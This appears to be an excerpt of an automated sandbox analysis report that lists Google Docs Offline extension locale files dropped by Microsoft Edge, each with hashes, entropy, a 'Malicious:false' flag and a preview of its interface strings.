                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                  Encrypted:false
